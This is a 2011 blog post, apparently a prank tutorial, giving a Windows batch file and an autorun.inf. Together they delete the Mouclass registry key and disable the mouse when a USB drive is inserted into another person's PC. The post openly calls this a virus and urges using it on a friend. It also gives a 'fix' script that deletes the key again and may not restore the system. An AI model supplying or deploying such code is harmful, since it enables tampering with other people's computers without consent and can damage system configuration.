Tuesday 2 August 2011

0

Disable your Friend’s Mouse by just Inserting a USB in His/Her PC

  • Tuesday 2 August 2011
  • saurav garg
  • Share
  • To use this trick first you have to create a Batch file in notepad by saving it with the .bat extension.

    Copy/Paste the below code in notepad and save it as filename.bat, Here filename could be any name but the extension should be .bat.

    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4 

    Now you have create a autorun.inf file to run the above batch file automatically by just inserting the USB. Here is the autorun fil. Copy paste is code in the in the new Notepad window. 

    [autorun]
    Open=filename.bat
    Action=Mouse Disable 

    Save this file as autorun.inf.

    Now you have created a virus that will disable the mouse. Copy both of the file in your or your friend’s USB drive and have fun... :)


    To re-enable the mouse, simply create another batch file with following script:
     
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 1 

    Save this file as .bat extension and run this batch file by just double clicking on it.

    Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)

    0 Responses to “ Disable your Friend’s Mouse by just Inserting a USB in His/Her PC ”

    Post a Comment